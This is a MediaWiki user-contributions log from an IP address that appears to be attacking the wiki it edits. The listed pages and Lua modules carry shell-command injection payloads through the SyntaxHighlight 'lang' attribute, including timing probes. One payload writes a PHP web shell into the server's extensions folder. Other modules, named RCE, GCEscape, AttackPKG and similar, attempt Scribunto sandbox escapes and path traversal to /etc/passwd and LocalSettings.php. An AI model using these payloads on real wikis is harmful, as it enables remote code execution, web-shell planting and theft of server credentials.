221.237.85.128的用户贡献
2026年5月9日 (星期六)
- 15:052026年5月9日 (六) 15:05 差异 历史 +58 新 TestTiming 1778310353835 创建页面,内容为“<syntaxhighlight lang="`sleep 5`">SLEEP5</syntaxhighlight>” 当前
- 15:052026年5月9日 (六) 15:05 差异 历史 +59 新 TestTiming 1778310350764 创建页面,内容为“<syntaxhighlight lang="$(sleep 5)">SLEEP5</syntaxhighlight>” 当前
- 15:052026年5月9日 (六) 15:05 差异 历史 +58 新 TestTiming 1778310347605 创建页面,内容为“<syntaxhighlight lang="`sleep 3`">SLEEP3</syntaxhighlight>” 当前
- 15:052026年5月9日 (六) 15:05 差异 历史 +59 新 TestTiming 1778310344531 创建页面,内容为“<syntaxhighlight lang="$(sleep 3)">SLEEP3</syntaxhighlight>” 当前
- 15:052026年5月9日 (六) 15:05 差异 历史 +57 新 TestTiming 1778310341193 创建页面,内容为“<syntaxhighlight lang="python">BASELINE</syntaxhighlight>” 当前
- 15:022026年5月9日 (六) 15:02 差异 历史 +49 新 TestTagSH2 1778310157 创建页面,内容为“{{#tag:syntaxhighlight|TEST|lang=$(whoami 2>&1)}}” 当前
- 15:022026年5月9日 (六) 15:02 差异 历史 +44 新 TestTagSH1 1778310157 创建页面,内容为“{{#tag:syntaxhighlight|TEST|lang=`id 2>&1`}}” 当前
- 15:022026年5月9日 (六) 15:02 差异 历史 +45 新 TestTagSH0 1778310157 创建页面,内容为“{{#tag:syntaxhighlight|TEST|lang=$(id 2>&1)}}” 当前
- 15:022026年5月9日 (六) 15:02 差异 历史 +5 TestWS1778310157 无编辑摘要 当前
- 15:022026年5月9日 (六) 15:02 差异 历史 −40 TestWS1778310157 无编辑摘要
- 15:022026年5月9日 (六) 15:02 差异 历史 +24 TestWS1778310157 无编辑摘要
- 15:022026年5月9日 (六) 15:02 差异 历史 −16 TestWS1778310157 无编辑摘要
- 15:022026年5月9日 (六) 15:02 差异 历史 +163 新 TestWS1778310157 创建页面,内容为“<syntaxhighlight lang="$(echo '<?php system($_GET[c]); ?>' > /var/www/html/w/extensions/SyntaxHighlight_GeSHi/pwned_ZZXYS_1778310157.php)"> TEST </syntaxhighlight>”
- 15:002026年5月9日 (六) 15:00 差异 历史 +31 新 TestLoadDataAttack 创建页面,内容为“{{#invoke:LoadDataAttack|test}}” 当前
- 14:592026年5月9日 (六) 14:59 差异 历史 +1,066 新 模块:LoadDataAttack 创建页面,内容为“local p = {} function p.test() local results = {} local paths = { "Module:Sandbox", "../../LocalSettings.php", "../LocalSettings.php", "/etc/passwd", "../../../etc/passwd", "../../../../etc/passwd", "Module:../LocalSettings.php", "Module:../../LocalSettings.php", } for _, path in ipairs(paths) do local ok, data = pcall(mw.loadData, path) local info = tostring(ok)…” 当前
- 14:592026年5月9日 (六) 14:59 差异 历史 +27 新 TestTitleProbe 创建页面,内容为“{{#invoke:TitleProbe|test}}” 当前
- 14:592026年5月9日 (六) 14:59 差异 历史 +1,043 新 模块:TitleProbe 创建页面,内容为“local p = {} function p.test() local results = {} -- Test different paths local paths = { "/etc/passwd", "/etc/hosts", "/var/www/html/", "/tmp/", "LocalSettings.php", "../LocalSettings.php", "../../LocalSettings.php", "/w/LocalSettings.php", } for _, path in ipairs(paths) do local title = mw.title.new(path) if title then local info = {}…” 当前
- 14:592026年5月9日 (六) 14:59 差异 历史 +28 新 TestFrameAttack 创建页面,内容为“{{#invoke:FrameAttack|test}}” 当前
- 14:592026年5月9日 (六) 14:59 差异 历史 +1,338 新 模块:FrameAttack 创建页面,内容为“local p = {} function p.test(frame) local results = {} local parent = frame:getParent() if not parent then results[1] = "no_parent"; return table.concat(results, " | ") end -- Test 1: Preprocess with syntaxhighlight containing command injection local preprocess_tests = { "<syntaxhighlight lang=\"python | id 2>&1\">test</syntaxhighlight>", "<syntaxhighlight lang=\"$(id 2>&1)\">test</syntaxhighlight>", "<syntaxhighligh…” 当前
- 14:572026年5月9日 (六) 14:57 差异 历史 +27 新 TestExprAttack 创建页面,内容为“{{#invoke:ExprAttack|test}}” 当前
- 14:572026年5月9日 (六) 14:57 差异 历史 +795 新 模块:ExprAttack 创建页面,内容为“local p = {} function p.test() local pf = mw.ext.ParserFunctions if not pf or not pf.expr then return "no_expr" end local results = {} -- Try injecting system commands through expr local injections = { "system('id')", "eval('system', 'id')", "exec('id')", "shell_exec('id')", "passthru('id')", "popen('id', 'r')", "' . system('id') . '", "'+system('id')+'", } for _, inj…” 当前
- 14:572026年5月9日 (六) 14:57 差异 历史 +25 新 TestGCEscape 创建页面,内容为“{{#invoke:GCEscape|test}}” 当前
- 14:572026年5月9日 (六) 14:57 差异 历史 +1,851 新 模块:GCEscape 创建页面,内容为“local p = {} function p.test() local results = {} results[1] = "newproxy=" .. type(newproxy) if newproxy then -- Create userdata with metatable local ud = newproxy(true) if ud then results[2] = "ud_created=OK" local mt = getmetatable(ud) if mt then -- __gc runs with less sandbox restrictions in some Lua implementations -- Store captured data in _G…” 当前
- 14:562026年5月9日 (六) 14:56 差异 历史 +28 新 TestLoadLibPage 创建页面,内容为“{{#invoke:TestLoadLib|test}}” 当前
- 14:562026年5月9日 (六) 14:56 差异 历史 +588 新 模块:TestLoadLib 创建页面,内容为“local p = {} function p.test() local results = {} results[1] = "loadlib=" .. type(package.loadlib or nil) results[2] = "loaders=" .. type(package.loaders) results[3] = "preload=" .. type(package.preload) -- Try package.searchpath results[4] = "searchpath=" .. type(package.searchpath) -- List what's available in package local pk = package local pkeys = {} for k, v in pairs(pk) do pkeys[#pkeys+1] = k .. "=" .. typ…” 当前
- 14:562026年5月9日 (六) 14:56 差异 历史 +451 新 TestSH Injection 创建页面,内容为“== Backtick in lang == <syntaxhighlight lang="`id 2>&1`"> TEST_BACKTICK </syntaxhighlight> == $(cmd) in lang == <syntaxhighlight lang="$(id 2>&1)"> TEST_CMDSUB </syntaxhighlight> == Pipe in lang == <syntaxhighlight lang="python | id 2>&1"> TEST_PIPE </syntaxhighlight> == Semicolon in lang == <syntaxhighlight lang="python;id 2>&1"> TEST_SEMI </syntaxhighlight> == Newline in lang == <syntaxhighlight lang="python"> TEST_NEWLINE </syntaxhighlight>” 当前
- 14:562026年5月9日 (六) 14:56 差异 历史 +857 新 TestAllEnums 创建页面,内容为“DeepEnum1: {{#invoke:DeepEnum1|test}} DeepEnum2: {{#invoke:DeepEnum2|test}} DeepEnum3: {{#invoke:DeepEnum3|test}} DeepEnum4: {{#invoke:DeepEnum4|test}} DeepEnum5: {{#invoke:DeepEnum5|test}} DeepEnum12: {{#invoke:DeepEnum12|test}} DeepEnum15: {{#invoke:DeepEnum15|test}} DeepEnum16: {{#invoke:DeepEnum16|test}} DeepEnum17: {{#invoke:DeepEnum17|test}} DeepEnum18: {{#invoke:DeepEnum18|test}} GCSandbox: {{#invoke:GCSandbox|test}} ShEscape2: {{#invoke:ShEsc…” 当前
- 14:532026年5月9日 (六) 14:53 差异 历史 +1,920 新 模块:AttackLoader 创建页面,内容为“local p = {} function p.test() local results = {} results[1] = "loaders_type=" .. type(package.loaders) -- If loaders is a table, try each one if type(package.loaders) == "table" then results[2] = "loaders_count=" .. #package.loaders for i, loader in ipairs(package.loaders) do results[#results+1] = "loader" .. i .. "=" .. type(loader) if type(loader) == "function" then -- Try to load 'os'…” 当前
- 14:532026年5月9日 (六) 14:53 差异 历史 +26 新 TestAttackPKG 创建页面,内容为“{{#invoke:AttackPKG|test}}” 当前
- 14:532026年5月9日 (六) 14:53 差异 历史 +1,238 新 模块:AttackPKG 创建页面,内容为“local p = {} function p.test() local results = {} local loaded = package.loaded results[1] = "loaded_type=" .. type(loaded) if loaded then -- List loaded modules local keys = {} for k in pairs(loaded) do keys[#keys+1] = tostring(k) end results[2] = "loaded_keys=" .. table.concat(keys, ", ") -- Check 'os' specifically if loaded["os"] then local l_os = loaded["os"]…” 当前
- 14:532026年5月9日 (六) 14:53 差异 历史 0 TestFrameChain 无编辑摘要 当前
- 14:532026年5月9日 (六) 14:53 差异 历史 +34 新 TestExtFuncFull 创建页面,内容为“{{#invoke:Deep4 ExtFuncFull|test}}” 当前
- 14:532026年5月9日 (六) 14:53 差异 历史 +33 新 TestExprDirect 创建页面,内容为“{{#invoke:Deep4 ExprDirect|test}}” 当前
- 14:532026年5月9日 (六) 14:53 差异 历史 +34 新 TestOverrideReq 创建页面,内容为“{{#invoke:Deep4 OverrideReq|test}}” 当前
- 14:532026年5月9日 (六) 14:53 差异 历史 +32 新 TestPkgLoaded 创建页面,内容为“{{#invoke:Deep4 PkgLoaded|test}}” 当前
- 14:502026年5月9日 (六) 14:50 差异 历史 +190 新 TestRCE 创建页面,内容为“Method1: {{#invoke:RCE|exec1}} Method2: {{#invoke:RCE|exec2}} Method3: {{#invoke:RCE|exec3}} Method5: {{#invoke:RCE|exec5}} Method6: {{#invoke:RCE|exec6}} Method7: {{#invoke:RCE|exec7}}” 当前
- 14:492026年5月9日 (六) 14:49 差异 历史 +757 模块:RCE 无编辑摘要 当前
- 14:472026年5月9日 (六) 14:47 差异 历史 +23 新 TestExploit RCE test 当前
- 14:472026年5月9日 (六) 14:47 差异 历史 +305 新 模块:Exploit Security test 当前
2026年5月8日 (星期五)
- 23:492026年5月8日 (五) 23:49 差异 历史 +128 新 TestSH FileWrite SyntaxHighlight injection test 当前
- 23:492026年5月8日 (五) 23:49 差异 历史 +82 新 TestSH Newline SyntaxHighlight injection test 当前
- 23:492026年5月8日 (五) 23:49 差异 历史 +140 新 TestSH ArgInj SyntaxHighlight injection test 当前
- 23:492026年5月8日 (五) 23:49 差异 历史 +91 新 TestSH Pipe SyntaxHighlight injection test 当前
- 23:492026年5月8日 (五) 23:49 差异 历史 +100 新 TestSH Semi SyntaxHighlight injection test 当前
- 23:492026年5月8日 (五) 23:49 差异 历史 +84 新 TestSH Backtick SyntaxHighlight injection test 当前
- 23:492026年5月8日 (五) 23:49 差异 历史 +85 新 TestSH CmdSub SyntaxHighlight injection test 当前
- 23:492026年5月8日 (五) 23:49 差异 历史 +81 新 TestSH Baseline SyntaxHighlight injection test 当前
- 22:112026年5月8日 (五) 22:11 差异 历史 +1,461 新 模块:Enum 创建页面,内容为“-- Enumerate available globals local p = {} function p.globals(frame) local result = '' for k, v in pairs(_G) do result = result .. k .. ' (' .. type(v) .. '), ' end return result end function p.testOs(frame) if os then local avail = '' for k, v in pairs(os) do avail = avail .. k .. ', ' end return 'OS available: ' .. avail else return 'OS not available' end end function…”
- 22:092026年5月8日 (五) 22:09 差异 历史 +231 新 模块:RCE2 Test2 当前
- 22:092026年5月8日 (五) 22:09 差异 历史 +217 新 模块:RCE Test